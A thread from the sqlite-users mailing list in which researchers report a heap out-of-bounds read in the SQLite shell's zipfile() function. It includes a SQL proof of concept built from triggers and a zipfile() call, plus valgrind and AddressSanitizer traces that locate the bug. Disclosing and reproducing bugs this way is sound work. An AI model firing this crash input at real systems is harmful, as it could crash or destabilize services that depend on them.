Re: [sqlite] Heap Out of Bound Read in Sqlite
Yongheng Chen wrote: > This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When > I use this specific version to compile sqlite, the problem can be repro. Unlikely to be a compiler issue. I can reproduce the bug with valgrind with SQLite shell built with: * gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0 * or clang-6.0.0-1ubuntu2 Dominique ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
On Tue, Dec 24, 2019 at 5:48 PM Richard Hipp wrote: > > On 12/24/19, Yongheng Chen wrote: > > > > When we run it with sqlite compiled with asan, we got a heap overflow crash. > > > > The bug exists in the latest development code. > > Unable to repro. Tried tip of trunk and release, using gcc and clang, > all with various combinations of -fsanitize=memory, > -fsanitize=address, -fsanitize=undefined, and running under valgrind. Hi I just tried the latest from trunk in fossil (1c0a05b09 2019-12-24 16:20:05 UTC) and I can reproduce the bug when running with valgrind: $ valgrind ./sqlite3 ==6674== Memcheck, a memory error detector ==6674== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al. ==6674== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info ==6674== Command: ./sqlite3 ==6674== SQLite version 3.31.0 2019-12-24 16:20:05 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ; sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ; sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ; ==6674== Invalid read of size 1 ==6674==at 0x12944E: zipfileStep (shell.c:6243) ==6674==by 0x1B8711: sqlite3VdbeExec (sqlite3.c:91052) ==6674==by 0x1BD58F: sqlite3Step (sqlite3.c:82703) ==6674==by 0x1BD58F: sqlite3_step (sqlite3.c:82768) ==6674==by 0x13161D: exec_prepared_stmt (shell.c:11379) ==6674==by 0x13161D: shell_exec (shell.c:11684) ==6674==by 0x132C7B: runOneSqlLine (shell.c:18265) ==6674==by 0x13CCE4: process_input (shell.c:18365) ==6674==by 0x11DD65: main (shell.c:19123) ==6674== Address 0x5d15ccf is 1 bytes before a block of size 120,000 alloc'd ==6674==at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==6674==by 0x16AAF0: sqlite3MemMalloc (sqlite3.c:23180) ==6674==by 0x1459E1: mallocWithAlarm (sqlite3.c:27071) ==6674==by 0x1459E1: sqlite3Malloc (sqlite3.c:27101) ==6674==by 0x1516A4: setupLookaside (sqlite3.c:158620) ==6674==by 0x1E463D: openDatabase (sqlite3.c:161240) ==6674==by 0x1327FF: open_db.part.64 (shell.c:12696) ==6674==by 0x132EA6: open_db (stdio2.h:97) ==6674==by 0x132EA6: runOneSqlLine (shell.c:18261) ==6674==by 0x13CCE4: process_input (shell.c:18365) ==6674==by 0x11DD65: main (shell.c:19123) ==6674== 0|NULL sqlite> Line where overflow is detected in shell.c:6243: 6242 }else{ !6243 if( zName[nName-1]!='/' ){ 6244 zName = zFree = sqlite3_mprintf("%s/", zName); Regards Dominique ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
This seems a problem of gcc(Ubuntu 5.5.0-12ubuntu5~16.04). When I use this specific version to compile sqlite, the problem can be repro. Just in case you need it, here’s the log I got: — SQLite version 3.31.0 2019-12-24 15:35:53 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ; sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ; sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ; sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ; = ==25839==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x634007ff at pc 0x0042c622 bp 0x7ffe62feaf20 sp 0x7ffe62feaf10 READ of size 1 at 0x634007ff thread T0 #0 0x42c621 in zipfileStep /data/xxx/sqlite/asan/shell.c:6243 #1 0x5a30f6 in sqlite3VdbeExec /data/xxx/sqlite/asan/sqlite3.c:91052 #2 0x5c155e in sqlite3Step /data/xxx/sqlite/asan/sqlite3.c:82703 #3 0x5c155e in sqlite3_step /data/xxx/sqlite/asan/sqlite3.c:82768 #4 0x436e0d in exec_prepared_stmt /data/xxx/sqlite/asan/shell.c:11379 #5 0x43da53 in shell_exec /data/xxx/sqlite/asan/shell.c:11684 #6 0x440631 in runOneSqlLine /data/xxx/sqlite/asan/shell.c:18265 #7 0x450f95 in process_input /data/xxx/sqlite/asan/shell.c:18365 #8 0x412a65 in main /data/xxx/sqlite/asan/shell.c:19123 #9 0x7fc3b2a9d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x413e18 in _start (/data/xxx/sqlite/asan/sqlite3+0x413e18) 0x634007ff is located 1 bytes to the left of 12-byte region [0x63400800,0x6341dcc0) allocated by thread T0 here: #0 0x7fc3b3754662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662) #1 0x4d2ea0 in sqlite3MemMalloc /data/xxx/sqlite/asan/sqlite3.c:23180 — Yongheng Chen > On Dec 24, 2019, at 11:48 AM, Richard Hipp wrote: > > On 12/24/19, Yongheng Chen wrote: >> >> When we run it with sqlite compiled with asan, we got a heap overflow crash. >> >> The bug exists in the latest development code. > > Unable to repro. Tried tip of trunk and release, using gcc and clang, > all with various combinations of -fsanitize=memory, > -fsanitize=address, -fsanitize=undefined, and running under valgrind. > > > -- > D. Richard Hipp > d...@sqlite.org ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
Re: [sqlite] Heap Out of Bound Read in Sqlite
On 12/24/19, Yongheng Chen wrote: > > When we run it with sqlite compiled with asan, we got a heap overflow crash. > > The bug exists in the latest development code. Unable to repro. Tried tip of trunk and release, using gcc and clang, all with various combinations of -fsanitize=memory, -fsanitize=address, -fsanitize=undefined, and running under valgrind. -- D. Richard Hipp d...@sqlite.org ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users
[sqlite] Heap Out of Bound Read in Sqlite
Hi, We found a oob read in sqlite. Here’s the PoC: — CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ; CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ; CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ; INSERT INTO v0 VALUES ( 10 , 10 ) ; INSERT INTO v0 VALUES ( 10 , 10 ) ; INSERT INTO v0 VALUES ( 10 , 10 ) ; SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ; — When we run it with sqlite compiled with asan, we got a heap overflow crash. The bug exists in the latest development code. Yongheng & Rui ___ sqlite-users mailing list sqlite-users@mailinglists.sqlite.org http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users